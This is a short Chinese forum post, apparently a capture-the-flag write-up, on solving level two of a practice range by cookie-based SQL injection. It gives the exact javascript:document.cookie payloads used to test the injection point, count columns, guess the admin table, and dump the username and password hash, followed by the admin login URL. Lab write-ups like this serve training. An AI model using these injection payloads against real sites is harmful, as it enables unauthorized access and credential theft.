第二关靶场已通关--HHH_Huaji

hhh_huaji   ·   发表于 2018-09-04 18:03:08   ·   CTF&WP专版

用cookie手工注入拿下后台管理员密码成功通过第二关所用代码语句

javascript:alert(document.cookie="id="+escape("X") 这里的X是  ?id=X  的X,

javascript:alert(document.cookie="id="+escape("X and 1=2"));判断是否存在注入点,

javascript:alert(document.cookie="id="+escape("X order by 10"));猜字段数,

javascript:alert(document.cookie="id="+escape("X union select 1,2,3,4,5,6,7,8,9,10 from admin"));猜表名  admin这个表不一定存在,只是猜测

javascript:alert(document.cookie="id="+escape("X union select 1,username,password,4,5,6,7,8,9,10 from admin"));猜列名的值

最后爆出username and passwrod的值进入后台 最后进入后台管理界面http://120.203.13.75:8001/admin

输入username的值和刚刚得到的md5加密的password 拿到第二关的Key

打赏我,让我更有动力~

0 Reply   |  Until 2018-9-4 | 1471 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.